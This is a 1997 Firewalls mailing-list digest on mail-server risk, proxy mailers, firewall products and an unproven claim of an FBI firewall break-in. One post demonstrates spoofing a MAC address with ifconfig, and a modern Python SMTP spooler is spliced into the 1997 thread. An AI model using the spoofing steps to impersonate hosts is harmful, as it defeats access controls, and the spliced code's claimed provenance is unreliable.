Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 3402B67653FCEFC58825641E0069123E; Mon, 13 Jan 97 11:07:26 EDT
To: rammeri
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 13 Jan 97 11:12:27 EDT
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

How about if someone hacks port 25 via one of the seemingly endless mail bugs (are you using sendmail?) so that they now have control of a machine on your internal net?

FWIW, I don't know of a good solution to this, short of being religious about keeping your mail demon updated and secure. Even if you have a mail server on the outside or on a DMZ which forwards to a mail server on the inside, it's just another hop. I suppose that would make it somewhat more difficult.

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: rammeri @ winternet.co.at @ smtp
Date: 01/13/97 05:55:18 PM
Subject: Secure firewall with only Linux-Kernel filtering possible?

Assume the following situation:

We are a company with 25 computer systems in a LAN, and with a 64k connection to the internet.

So ... my question is ... is the following security-schema good or why not?

Our LAN is divided into several parts, so we use 192.168.0.0 - 192.168.4.0 for our internet network. Between the router to the internet and the first local router, we have a firewall-setup with only the linux-kernel-filtering/masquerading. The firewall allows any connections to be made from the internal-net. But disallows any connection but a port 25 that will be forwarded to our mail-host in the internal net (even this connection is limited to our MX host). The firewall disallows incoming ftp-data. On the firewall there is NO daemon running, not even telnet for administration or sth. like this.
...
Ok .. so tell me please, why is this setup insecure?
thx,
ingo
--
----------------------------------------------------------------------
No need to turn out the light  | Email: rammeri@winternet.co.at
you feel so depressed inside   | SMS: +436643552547@text.mobilkom.at
when you think of all your     | Phone: +43-664-3552547
wasted years at night          |        +43-7253-7697
----------------------------------------------------------------------

From firewalls-owner Mon Jan 13 12:42:38 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA24766 for firewalls-outgoing; Mon, 13 Jan 1997 12:07:03 -0800 (PST)
Received: from ereapp.erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA24714 for ; Mon, 13 Jan 1997 12:06:38 -0800 (PST)
Received: (from smap@localhost) by ereapp.erenj.com (8.8.3/8.8.3) id PAA02539; Mon, 13 Jan 1997 15:03:19 -0500
Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma002516; Mon Jan 13 15:02:50 1997
Received: from stargate.erenj.com (stargate.erenj.com [159.70.1.8]) by eredns.erenj.com (8.7.4/8.7.3) with SMTP id PAA26802; Mon, 13 Jan 1997 15:02:49 -0500
Received: from stargate.erenj.com by stargate.erenj.com; (5.65v3.2/1.1.8.2/12Feb96-1009AM/bdboyle@erenj.com) id AA17377; Mon, 13 Jan 1997 15:02:48 -0500
Message-Id: <32DA94E8.1CFB@erenj.com>
Date: Mon, 13 Jan 1997 15:02:48 -0500
From: "Bryan D. Boyle"
Organization: Exxon Research and Engineering Co.
X-Mailer: Mozilla 3.0C-NSCP (X11; I; OSF1 V4.0 alpha)
Mime-Version: 1.0
To: Frank Beall
Cc: firewalls@GreatCircle.COM
Subject: Re: lab tests
References: <199701131831.KAA17088@palrel1.hp.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank Beall wrote:
>
> If you're evaluating firewalls, check this article out from Data Communications.
> http://www.data.com/Lab_Tests/Firewalls.html

Be aware that this test is over a year old from publication, which means the tests were done in Sept 95 probably. In this industry, this may as well be a performance test of an IMS 8000 running TurboDOS.

--
Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338
#include | http://www.access.digex.net/~bdboyle/index.html
"They that can give up liberty to obtain a little temporary safety deserve neither liberty nor safety." - Benjamin Franklin, Historical Review of Pennsylvania

From firewalls-owner Mon Jan 13 12:44:28 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA27248 for firewalls-outgoing; Mon, 13 Jan 1997 12:35:38 -0800 (PST)
Received: from mil-exch-1.mildenhall.af.mil ([132.19.156.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA27237 for ; Mon, 13 Jan 1997 12:35:27 -0800 (PST)
Received: by mil-exch-1.mildenhall.af.mil with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC0191.2CB89030@mil-exch-1.mildenhall.af.mil>; Mon, 13 Jan 1997 20:34:29 -0000
Message-ID:
From: Neuman Dave SSgt 100CS/SCBBN
To: "'firewalls@greatcircle.com'" , "'Christopher Tighe'"
Subject: RE: tcp port 5510
Date: Mon, 13 Jan 1997 20:34:27 -0000
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Practical Unix & Internet Security (Garfinkel & Spafford, Apr 1996, p.934) 5510 is used by a protocol called "securidprop" described as "Security Dynamics ACE/Server slave."

Cheers!
Dave ...
Dave Neuman, SSgt, 100CS/SCBBN
Network Security Manager
RAF Mildenhall, UK
DSN Phone: 314-238-3860   CMCL Phone: +44-1638-543860
DSN Fax:   314-238-2504   CMCL Fax:   +44-1638-542504
mailto:dave.neuman@mildenhall.af.mil

>----------
>From: Christopher Tighe[SMTP:ctighe@dat.tds.de]
>Sent: Monday, January 13, 1997 3:41 PM
>To: firewalls@greatcircle.com
>Subject: tcp port 5510
>
>Hi
>
> does anyone know what tcp port 5510 is used for, or
>where I can find it out? - it is not listed in rfc 1700.
>
>cheers
>chris
>--
>+------------------------------------------------------------+
>| Christopher Tighe BSc. CCIE.    Tel: ++49 (0)7131 6235-119 |
>| Network Services                Fax: ++49 (0)7131 6235-115 |
>| tele-daten service GmbH         E-Mail: ctighe@tds.de      |
>| Titotstr. 7-9                                              |
>| 74072 Heilbronn                      \"""/                 |
>| Germany                              (o o)                 |
>+------------------------------------.ooO(_)Ooo.-------------+
>

From firewalls-owner Mon Jan 13 12:59:34 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA24481 for firewalls-outgoing; Mon, 13 Jan 1997 12:03:32 -0800 (PST)
Received: from gate.ups.com (gate.ups.com [198.80.14.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA24455 for ; Mon, 13 Jan 1997 12:03:13 -0800 (PST)
Received: by gate.ups.com id AA01975 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Mon, 13 Jan 1997 15:02:53 -0500
Received: by gate.ups.com (Protected-side Proxy Mail Agent-2); Mon, 13 Jan 1997 15:02:53 -0500
Received: by gate.ups.com (Protected-side Proxy Mail Agent-1); Mon, 13 Jan 1997 15:02:53 -0500
Date: Mon, 13 Jan 1997 15:02:50 -0500 (EST)
From: Dave Wreski
X-Sender: tel1dvw@butthead
To: firewalls@greatcircle.com
Subject: SUMMARY: Restricting port access
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all. I just wanted to drop a quick thanks to those that replied to my question. The information was very helpful.
Most people simply said to block individual ports to prevent some network services (NFS, NIS+) from being used outside the network. Some said that it is the best defense against port guessing attacks, and changes in software programs that all-of-the-sudden have services on ports where there weren't before.

"Daniel J Blander" mentioned:

    By controlling ports, you are more likely to notice attacks against your site. Inherent to most port controlling software/systems is a logging facility that permits you to begin identifying attacks and attack patterns. While this seems not terribly effectual as a protection in and of itself, it is invaluable in protecting yourself against potential future threats.

IP Spoofing was also mentioned.

Ryan Russell mentioned that "It's really a matter of a trust relationship. Generally, it's best to have the minimum amount of trust you need to get the job done."

Again, I appreciate all your comments, and hope I can provide some valuable input one day...

Dave
-----------------------------------------------------------------------
"The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc."
-----------------------------------------------------------------------
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc

From firewalls-owner Mon Jan 13 13:20:50 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA29895 for firewalls-outgoing; Mon, 13 Jan 1997 13:07:53 -0800 (PST)
Received: from cypress.cycon.com (cypress.CYCON.COM [198.202.237.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA29832 for ; Mon, 13 Jan 1997 13:07:29 -0800 (PST)
Received: from localhost (carlson@localhost) by cypress.cycon.com (8.7.5/8.7.3) with SMTP id QAA02694 for ; Mon, 13 Jan 1997 16:09:48 -0500
Date: Mon, 13 Jan 1997 16:09:46 -0500 (EST)
From: Chris Carlson
To: firewalls@GreatCircle.COM
Subject: Re: lab tests
In-Reply-To: <199701131831.KAA17088@palrel1.hp.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 13 Jan 1997, Frank Beall wrote:

> If you're evaluating firewalls, check this article out from Data Communications.
> http://www.data.com/Lab_Tests/Firewalls.html
>

As with any test, a few of the firewall vendors that were tested (November 21, 1995) have expressed problems with the testing methodology. Refer to issues following the test for company and editorial replies. DataComm is performing a new set of testing to be released sometime in March 1997. Check their editorial calendar for the exact issue.
Chris
--
---------------------------------------------------------------------
Chris Carlson                                http://www.cycon.com
CYCON Technologies                           info@cycon.com
carlson@cycon.com                            (703) 383-0247
CYCON Labyrinth Firewall - Stateful Inspection & Address Translation
---------------------------------------------------------------------

From firewalls-owner Mon Jan 13 13:51:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA29750 for firewalls-outgoing; Mon, 13 Jan 1997 13:06:28 -0800 (PST)
Received: from xyzzy.plugh.edmonton.ab.ca (xyzzy.plugh.edmonton.ab.ca [198.161.22.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA29710 for ; Mon, 13 Jan 1997 13:06:09 -0800 (PST)
Received: (from uucp@localhost) by xyzzy.plugh.edmonton.ab.ca (8.6.12/8.6.9) id OAA03688; Mon, 13 Jan 1997 14:05:50 -0700
Received: from snouts-gw.obtuse.com(192.168.30.61), claiming to be "snouts.obtuse.com" via SMTP by mailhost.plugh.edmonton.ab.ca, id smtpd03686aaa; Mon Jan 13 14:05:45 1997
Received: (from beck@localhost) by snouts.obtuse.com (8.7.5/8.7.3) id OAA08826; Mon, 13 Jan 1997 14:06:30 -0700
From: Bob Beck
Message-Id: <199701132106.OAA08826@snouts.obtuse.com>
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Mon, 13 Jan 1997 14:06:29 -0700 (MST)
Cc: rammeri@winternet.co.at, firewalls@GreatCircle.COM
In-Reply-To: <199701131907.LAA00453@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jan 13, 97 11:12:27 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> How about if someone hacks port 25 via
> one of the seemingly endless mail bugs (are
> you using sendmail?) so that they now have
> control of a machine on your internal net?
>
> FWIW, I don't know of a good solution to this,
> short of being religious about keeping your
> mail demon updated and secure. Even if you
> have a mail server on the outside or on a DMZ
> which forwards to a mail server on the inside,
> it's just another hop. I suppose that would make
> it somewhat more difficult.
>

No, it's not just another hop. Most of the endless sendmail holes (and don't kid yourself, other mailers have 'em too) and just "keeping current" doesn't help. I know lots of admins that "keep current" and are still often one release behind sendmail. That's usually all it takes :-)

However, most mailer problems are due to one of two circumstances:

1) The intruder talking directly to a large unverified privileged program (i.e. sendmail)

2) The large privileged program that is setuid being invoked by normal users in a manner to gain access to root.

From a firewall point of view the second is less troublesome, since you presumably trust your lusers or keep them off the mailserver. (or don't run sendmail setuid root, etc. etc.) It's 1) that you're worried about.

The simple answer is to run something like Obtuse smtpd (ftp://ftp.obtuse.com/smtpd) or TIS smap/smapd (wherever TIS is sold in your neighborhood) on a bastion host that passes your mail in/out from your mail server(s) that are inside. You have now significantly reduced the risk of a mail daemon compromise. (sendmail or otherwise.) (People can still mail your users evil things and ask them to run them somehow, but that's another ball of wax).

Either of those should run fine on your linux firewall. smtpd is free too.

-Bob
--
Bob Beck                            Obtuse Systems Corporation
beck@obtuse.com                     http://www.obtuse.com/
True Evil hides its real intentions in its street address. Search and you shall find it, and the truth shall set you free.
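The design Bob Beck recommends, as an added example (illustrative code written for this digest, not smap, smapd or Obtuse smtpd): a small program that needs no privileges is the only thing that speaks SMTP to the outside, accepts a message into a spool directory and does nothing else, so a bug in the large MTA inside is never reachable from the network. The host name, the line and message limits and the spool file layout are assumptions.

```python
import re
import tempfile

MAX_LINE = 1000          # assumption: hard limit on one client line
MAX_MESSAGE = 1_000_000  # assumption: 1 MB per message
ADDR_RE = re.compile(r"^<?([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+)>?$")


def parse_addr(arg, prefix):
    # 'FROM:<a@b>' -> 'a@b'; None unless the argument is one plain address
    m = ADDR_RE.match(arg[len(prefix):].strip()) if arg.upper().startswith(prefix) else None
    return m.group(1) if m else None


class SmtpFrontEnd:
    """One SMTP session as a state machine. feed() takes a client line and
    returns the reply ("" while collecting DATA). Only what a relay needs is
    accepted; VRFY, EXPN and anything exotic get 502 and touch no other code."""

    def __init__(self, spool_dir):
        self.spool_dir = spool_dir
        self.quit = False
        self.spooled = []       # spool files written in this session
        self.reset()

    def reset(self):
        self.in_data = False
        self.sender = None
        self.rcpts = []
        self.body = []
        self.size = 0

    def feed(self, line):
        if len(line) > MAX_LINE:        # refuse oversize input outright
            self.quit = True
            return "500 Line too long"
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 frontend.example.invalid"   # assumed name, no extensions
        if verb == "MAIL":
            addr = parse_addr(arg, "FROM:")
            if addr is None:
                return "501 Syntax error in parameters"
            self.reset()
            self.sender = addr
            return "250 OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL first"
            addr = parse_addr(arg, "TO:")
            if addr is None:
                return "501 Syntax error in parameters"
            self.rcpts.append(addr)
            return "250 OK"
        if verb == "DATA":
            if not self.rcpts:
                return "503 Need RCPT first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            self.quit = True
            return "221 Bye"
        return "502 Command not implemented"

    def _data_line(self, line):
        if line == ".":
            self._spool()
            self.reset()
            return "250 OK, message queued"
        if line.startswith(".."):
            line = line[1:]                 # RFC 5321 dot-unstuffing
        self.size += len(line) + 2
        if self.size > MAX_MESSAGE:         # drop the session, keep nothing
            self.quit = True
            return "552 Message too large"
        self.body.append(line)
        return ""

    def _spool(self):
        # Envelope then body in a fresh file, so the trusted pickup process
        # (smapd in the TIS kit) never reads a half-written message.
        with tempfile.NamedTemporaryFile("w", prefix="msg.", dir=self.spool_dir,
                                         delete=False) as f:
            f.write("FROM %s\n" % self.sender)
            f.writelines("RCPT %s\n" % r for r in self.rcpts)
            f.write("BODY\n" + "\n".join(self.body) + "\n")
            self.spooled.append(f.name)


def run_session(lines, spool_dir=None):
    """Drive one session from client lines; returns (replies, spooled texts)."""
    fe = SmtpFrontEnd(spool_dir or tempfile.mkdtemp())
    replies = []
    for line in lines:
        replies.append(fe.feed(line))
        if fe.quit:
            break
    return replies, [open(p).read() for p in fe.spooled]
```

Wiring feed() to a socket one line at a time, in a process with no privileges and a spool directory as its only writable path, is all that remains; the inside MTA then reads the spool and never sees the client.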
From firewalls-owner Mon Jan 13 14:29:50 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA28865 for firewalls-outgoing; Mon, 13 Jan 1997 12:57:06 -0800 (PST)
Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA28838 for ; Mon, 13 Jan 1997 12:56:47 -0800 (PST)
Received: by hidata.com; id AA19120; Mon, 13 Jan 97 12:56:38 PST
Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma019118; Mon, 13 Jan 97 12:56:25 -0800
Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC0151.10014A30@oscntsrv.hidata.com>; Mon, 13 Jan 1997 12:55:33 -0800
Message-Id:
From: "Stout, Bill"
To: "'firewalls@GreatCircle.COM'"
Subject: RE: Newbie Q's & Class 3 Firewalls?
Date: Mon, 13 Jan 1997 12:55:32 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Friday, January 10, 1997 12:36 PM, John Cross[SMTP:jcross@grtk.com] wrote:
> I'm currently trying to find a replacement for our TIS firewall running on a
> BSD box. I've asked for product info on the following:
> Guardian
> OnGuard
> CheckPoint
> Eagle NT
> I'm planning on running the system on an NT pentium box.

Why, pray tell, would you want to do that? You must be using the fwtk, Gauntlet is one of the best firewalls out there, and only a bad experience would make one replace it.

Also, moving to an NT based firewall does not give you all capabilities of a UNIX version of that same firewall. Unless things have recently changed, vendors do not have all features available on the NT version as they do on their (higher-end) UNIX versions.

I refrain from saying additional things about NT security, since that would restart lengthy old threads...
Bill Stou

From firewalls-owner Mon Jan 13 14:55:08 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA05295 for firewalls-outgoing; Mon, 13 Jan 1997 13:56:00 -0800 (PST)
Received: from emout09.mail.aol.com (emout09.mx.aol.com [198.81.11.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA05222 for ; Mon, 13 Jan 1997 13:55:37 -0800 (PST)
From: ACDS@aol.com
Received: (from root@localhost) by emout09.mail.aol.com (8.7.6/8.7.3/AOL-2.0.0) id QAA25992 for firewalls@greatcircle.com; Mon, 13 Jan 1997 16:55:18 -0500 (EST)
Date: Mon, 13 Jan 1997 16:55:18 -0500 (EST)
Message-ID: <970113161426_1690827825@emout09.mail.aol.com>
To: firewalls@greatcircle.com
Subject: RE: Outlink updates "The Firewall Report"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Has anyone seen this report? Is it really worth almost a thousand dollars? Are these people related to NCSA or any of the vendors in any way?

>>Outlink, Inc., an information technology market research firm, has updated "The Firewall Report" publication. Outlink is now selling the report with profiles of Trusted Information System's Gauntlet 3.2, Secure Computing's Sidewinder 3.0, Secure Computing's BorderWare Firewall Server 4.0 and Milkyway Networks' Black Hole 3.0 version. Outlink's research profiles 20 leading firewall solutions and suppliers. Priced at $995, "The Firewall Report" contains profiles of 20 leading products and their suppliers. Each profile is approximately 60 to 80 pages in length with detailed research.
<<

From firewalls-owner Mon Jan 13 14:59:28 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA08304 for firewalls-outgoing; Mon, 13 Jan 1997 14:31:26 -0800 (PST)
Received: from geocities.com ([204.7.246.133]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA08296 for ; Mon, 13 Jan 1997 14:31:11 -0800 (PST)
Received: from 193.230.255.2.flex.ro (dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id OAA18478; Mon, 13 Jan 1997 14:18:02 -0800 (PST)
Message-Id: <199701132218.OAA18478@geocities.com>
From: "Gabriel Dura"
To: "Gene Lee"
Cc:
Subject: Re: FW-1 hacked? - Reply
Date: Mon, 13 Jan 1997 23:57:22 +0200
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Please take a look at my answer to Timothy L. Hermans

----------
> From: Gene Lee
> To: mike ; 'Gabriel Dura'
> Cc: firewalls@GreatCircle.COM
> Subject: RE: FW-1 hacked? - Reply
> Date: luni, ianuarie 13, 1997 09:39
> On Friday, January 10, 1997 11:10 AM, Gabriel Dura[SMTP:dura@geocities.com] wrote:
> >There is a guy, working on his own, who claims he knows how to penetrate
>FBI's firewall.
>As a proof I was told that behind the firewall there is another
>computer 'phi.fbi.gov'.

Just because you can name a hostname behind the firewall is no proof of penetration. A good example is in a "polite" SMTP (also NNTP) transaction, say through a SOCKS server, the host sending the message also sends its hostname, which means that the e-mail has an internal hostname in its header. All this and still no firewall breach (although some may argue that the leakage of internal addresses may constitute some form of compromise - but it's still through no action on the part of an attacker).
If I were you, I'd ask for a bit more proof than a flimsy internal hostname...

--
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Mon Jan 13 15:12:57 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA06818 for firewalls-outgoing; Mon, 13 Jan 1997 14:12:13 -0800 (PST)
Received: from geocities.com ([204.7.246.133]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA06799 for ; Mon, 13 Jan 1997 14:11:59 -0800 (PST)
Received: from 193.230.255.2.flex.ro (dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id OAA13239; Mon, 13 Jan 1997 14:04:27 -0800 (PST)
Message-Id: <199701132204.OAA13239@geocities.com>
From: "Gabriel Dura"
To: "Timothy L Hermans"
Cc:
Subject: Re: FW-1 hacked? - Reply
Date: Mon, 13 Jan 1997 23:34:34 +0200
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I understand what you mean but he also pointed out to "ard.fbi.gov" as being the FBI's firewall machine. I checked to see if this site is real and it is - 192.108.246.1

He said that he entered and exited and that he did not retrieve anything. I know him for a long time and I don't think he's the kind of man you said "ie. the idea that hacking the FBI makes everyone think you have big cojones". He has never been in the US and he doesn't know anyone there.

Gabriel Dura
dura@geocities.com

P.S.
I never said I'm a firewall expert, I never tried to impress anyone here. I
just tried to help. If I had known everything I wouldn't have needed
firewalls@GreatCircle.COM. I just want to learn more. I can learn more even
from your answers! I don't have other means! Is this wrong?

Anyway, if there is anyone who wants to know whether FW-1 is hacker-proof or
not, why not hook a well-configured firewall machine onto the Internet and
give a prize to the first one who proves that he entered it, leaving a trail
inside the machine? You'll have the answer then.

----------
> From: Timothy L Hermans
> To: firewalls@GreatCircle.COM
> Cc: Gabriel Dura
> Subject: Re: FW-1 hacked? - Reply
> Date: Monday, January 13, 1997 16:04
>
> This is the most ridiculous proof I have ever heard. Have you corroborated
> his story? How? What if I told you that there was a host called
> "hoover-wears-a-dress.fbi.gov". Would that be proof that I had hacked the
> FBI? Of course not. You'd have to hack in yourself to see.
>
> Looks like you and this "guy" are caught up in hacker-itis (ie. the idea
> that hacking the FBI makes everyone think you have big cojones). Figure out
> how to USE FW-1 competently and I'd be much more impressed.
>
> On Friday, Jan 10 "Gabriel Dura" wrote:
> > There is a guy, working on his own, who claims he knows how to penetrate
> > FBI's firewall.
> > As a proof I was told that behind the firewall there is another
> > computer 'phi.fbi.gov'.
> >
> > In the case of me being correctly informed and FBI is using FW-1 you have
> > an answer.
> >
> > Hope it helps,
> > Gabriel Dura
> > dura@geocities.com
> >
> > P.S. I can not guarantee the accuracy of this information and I can not
> > reveal the person who told me.
> >
> > ----------
> > > From: mike
> > > To: firewalls@GreatCircle.COM
> > > Subject: FW-1 hacked?
> > > Date: Wednesday, January 08, 1997 16:27
> > >
> > > Hi all
> > > Does anyone know if FW-1 was ever hacked?
> >
> Tim Hermans
> FannieMae/MornetPlus Unix Engineering Group

From firewalls-owner Mon Jan 13 15:16:35 1997
Date: Mon, 13 Jan 1997 17:42:32 -0500 (EST)
From: Todd Graham Lewis
To: Firewalls Mailing List
Subject: Ethernet hardware addresses

This has been pointed out before, but I thought that I'd pass this along to
the list to reinforce how worthless ethernet MAC addresses are.

Most (virtually all) ethernet cards allow one to reprogram what MAC address
it uses. The ioctl under Linux is SIOCSIFHWADDR, for "set hardware address".
I was going to write my own program to do it, and while doing research for
that, I discovered that it's already built into the standard ifconfig for
Linux. (If you want to write your own, just search for SIOCSIFHWADDR in
ifconfig.c. The code is really simple; just an ioctl.)
To demonstrate how easy this is to do, watch how long it took me (output
edited; these are the commands and the interesting output):

reflections# ifconfig eth0
eth0      Link encap:10Mbps Ethernet  HWaddr 00:A0:24:81:A7:44
reflections# ifconfig eth0 down
reflections# ifconfig eth0 hw ether 00:A0:24:81:A7:45
reflections# ifconfig eth0
eth0      Link encap:10Mbps Ethernet  HWaddr 00:A0:24:81:A7:45

Again, if you are using MAC addresses for anything more than _very_ trivial
authentication, be aware that any user under virtually any operating system
can do what I just did in three commands. If you want real security, use
Kerberos or some other appropriate cryptosystem.

__
Todd Graham Lewis                Linux!                Core Engineering
Mindspring Enterprises   tlewis@mindspring.com   (800) 719 4664, x2804

From firewalls-owner Mon Jan 13 16:46:48 1997
From: blitton@directs.com
Date: Mon, 13 Jan 1997 17:41:31 -0600
Subject: Question
To: firewalls@GreatCircle.com

Can someone please tell me where I can find a list of port numbers and the
process assigned to each, i.e. port 80 => http, port 443 => shttp.

I am especially interested in what port number is assigned to snmp.

Thanks in advance and sorry if this is off topic.
bruce

From firewalls-owner Mon Jan 13 17:20:09 1997
Date: Wed, 31 Dec 1969 16:00:00 -0800
To: Matthew Howard
From: George Matovu
Subject: RE: Cisco PIX
Cc: Firewalls-Digest@GreatCircle.com

Does the PIX firewall support any session key distribution protocol? In
other words, is it possible for the end points in a communication to exchange
a new session key for every new session?

TIA,
George Matovu
International Network Services
http://www.ins.com

At 06:10 PM 1/6/97 -0800, you wrote:
>In the mill. The Private Link Encryption card today supports AH/ESP tunnel
>mode, with DES (cbc). We need to do some additional testing with client
>software.
>
>matt
>
>At 05:40 PM 1/6/97 -0500, Larson, Erik wrote:
>>I like the PIX in concept and sometimes in practice. I do wish it
>>offered client software to allow remote VPN access, however. That
>>particular feature is critical in much of the work we do for our
>>customer base.
>>
>>-ekl
>>
>>>-----Original Message-----
>>>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net]
>>>Sent: Sunday, January 05, 1997 11:14 PM
>>>To: Firewalls-Digest@GreatCircle.com
>>>Subject: Cisco PIX
>>>
>>>Is there a bastion host / proxy server that out-performs
>>>Cisco's PIX in throughput? Security? Ease of implementation?
>>>From my limited perspective as a newbie, the Cisco PIX in
>>>combination with a good screening router is a very good
>>>firewall. Not to be a wise guy, I'm seriously asking, with this
>>>technology available, is there ever a reason to build one from
>>>scratch? I might be able to do it cheaper - but if it takes a couple
>>>weeks or a month to do it might cost more. I'm not in any way
>>>affiliated with Cisco.
>>>KeithStevens
>>>keith@acsinc.net
>>>
>>
>
> Matthew Howard
> Product Line Manager              mhoward@cisco.com
> Internet Business Unit            408-526-4720 (voice)
> Cisco Systems Inc.                408-527-8122 (fax)
> 170 West Tasman Drive
> Building VM2 (corner of First & Vista Montana)
> San Jose, CA 95134

From firewalls-owner Mon Jan 13 19:13:54 1997
Date: Tue, 14 Jan 1997 10:38:53 -0800
To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU
From: PaLaN
Subject: !! Quake Site Hacked !!
Hello ppl,

Anybody know how the hackers managed to hack into Crack dot com and get the
source code for id's Quake 1.01, as well as Crack's newest project, Golgotha,
and the older games Abuse and Mac Abuse?? What method of attack did they
use? I heard they broke into the web server and file server to get access?
Can anyone confirm this?

Hmm...I also heard that the hackers, able to get through Crack's firewall,
left intact a bash-history file that recorded all their movements (stupid
rite..). They even logged onto IRC's #quake to brag about their exploits!!
Wonder what sorta firewall crack dot com used for protection?

rgds,
PaLaN

From firewalls-owner Mon Jan 13 19:15:05 1997
From: Adam Shostack
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Mon, 13 Jan 1997 21:02:10 -0500 (EST)
Cc: rammeri@winternet.co.at, firewalls@GreatCircle.COM

Ryan Russell/SYBASE wrote:
| How about if someone hacks port 25 via
| one of the seemingly endless mail bugs (are
| you using sendmail?)
| so that they now have
| control of a machine on your internal net?
|
| FWIW, I don't know of a good solution to this,
| short of being religious about keeping your
| mail demon updated and secure. Even if you
| have a mail server on the outside or on a DMZ
| which forwards to a mail server on the inside,
| it's just another hop. I suppose that would make
| it somewhat more difficult.

qmail. www.qmail.org

Adam

quick comparison chart:

qmail                              sendmail
-----                              --------
210k tar.gz                        900k tar.gz
many small binaries                one huge binary
one setuid (qmail)                 one (root) setuid program
designed for security              designed to handle complex mail,
                                   like uucp/smtp/chaos
must be artificially               oh-so-quick that it has its own rate
slowed to avoid maiming            limiting program so it doesn't bring
sendmail                           itself to its knees
many small confusing               one famously painful config file
config files
release of the month club          bug of the month club
(soon to hit v1.0)
(no security holes)                known bad
possible hubris                    value causes proper paranoia

--
"It is seldom that liberty of any kind is lost all at once."
                                                             -Hume

From firewalls-owner Mon Jan 13 20:08:07 1997
From: "Jung Jun Lee"
To: "GreatCircle"
Subject: Does anybody use streamworks proxy on Gauntlet
Date: Tue, 14 Jan 1997 11:30:08 +0900

